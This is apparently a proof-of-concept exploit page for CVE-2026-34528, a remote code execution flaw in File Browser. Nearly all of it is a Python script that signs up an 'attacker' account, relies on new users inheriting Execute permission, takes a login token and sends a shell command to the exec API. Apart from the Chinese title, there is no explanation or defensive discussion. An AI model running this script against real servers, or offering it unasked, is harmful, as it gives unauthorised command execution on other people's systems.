CVE-2026-34528 File Browser远程代码执行漏洞

import requests # Target configuration target_host = "http://localhost:8080" signup_url = f"{target_host}/api/public/signup" login_url = f"{target_host}/api/login" exec_url = f"{target_host}/api/resources/exec" # Attacker credentials username = "attacker" password = "secure_password_123" # Step 1: Register a new user # The vulnerability triggers here: the new user inherits 'Execute' permission signup_payload = { "username": username, "password": password } try: response = requests.post(signup_url, json=signup_payload) if response.status_code == 200: print("[+] User registered successfully.") else: print("[-] Registration failed.") exit() except Exception as e: print(f"[-] Error during registration: {e}") exit() # Step 2: Login to get authentication token login_payload = { "username": username, "password": password } try: response = requests.post(login_url, json=login_payload) if response.status_code == 200: token = response.json().get('data') print(f"[+] Logged in. Token: {token}") else: print("[-] Login failed.") exit() except Exception as e: print(f"[-] Error during login: {e}") exit() # Step 3: Execute arbitrary command # Using the inherited permission to run commands (e.g., 'id' or 'whoami') headers = { "X-Auth": token, "Content-Type": "application/json" } # Command to execute (must be in the allowed commands list or via shell bypass if configured) command_payload = { "command": "whoami", "async": False } try: response = requests.post(exec_url, json=command_payload, headers=headers) if response.status_code == 200: print("[+] Command executed successfully.") print("[+] Output:", response.text) else: print(f"[-] Command execution failed. Status: {response.status_code}") print(response.text) except Exception as e: print(f"[-] Error during command execution: {e}")